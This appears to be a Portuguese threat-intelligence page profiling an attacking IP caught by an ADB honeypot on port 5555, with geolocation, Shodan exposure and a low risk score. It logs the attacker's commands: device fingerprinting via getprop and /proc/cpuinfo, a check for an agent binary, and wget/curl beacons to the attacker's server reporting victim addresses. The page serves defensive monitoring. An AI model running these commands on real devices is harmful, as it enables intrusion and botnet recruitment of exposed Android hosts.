Ameaca Ativa • BAIXO
31.7.58.138
🎯
100
Ataques Totais
🔌
1
Portas
📡
1
Tipos de Ataque
🦠
0
Malware
Geolocalizacao
- Pais
- 🇨🇭 CH
- Cidade
- Zurich
- ASN
- AS51852
- ISP
- Private Layer INC
Tipos de Ataque
adb_honeypot
Portas Atacadas
5555
Malware Associado
Sem malware associado
Comandos Executados
$
uname -m14x$
getprop ro.product.cpu.abi14x$
echo "===IDENT==="
id 2>/dev/null
hostname 2>/dev/null
echo "===PROPS==="
for k in ro.product.cpu.abi ro.product.cpu.abilist ro.product.cpu.abilist64 ro.product.cpu.abilist32 ro.product.model ro.product.manufacturer ro.product.brand ro.product.device ro.product.board ro.build.version.release ro.build.version.sdk ro.build.version.security_patch ro.build.fingerprint ro.build.type ro.hardware ro.boot.hardware ro.serialno; do
V=$(getprop $k 2>/dev/null)
[ -n "$V" ] && echo "$k=$V"
done
echo "===6x$
grep -E '^(CPU architecture|Processor|model name)' /proc/cpuinfo 2>/dev/null | head -34x$
ls /system/lib64/libc.so 2>/dev/null && echo L64 || echo L324x$
wc -c < /data/local/tmp/barco-agent-arm64 2>/dev/null2x$
wget -qO- 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null || /system/bin/curl -s 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null || curl -s 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null; echo __rc=$?1x$
wget -qO- 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null || /system/bin/curl -s 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null || curl -s 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null; echo __rc=$?1xExposicao Shodan InternetDBShodan
Dados InternetDB, nao em tempo real
Portas
80443300030015432808190909999
Hostnames
moonbet.unowww.wired4.infontp.digitalsuisse.comwired4.info
CPEs
cpe:/a:f5:nginxcpe:/a:postgresql:postgresql
Avaliacao de Risco
30
/100
BaixoMedioAltoCritico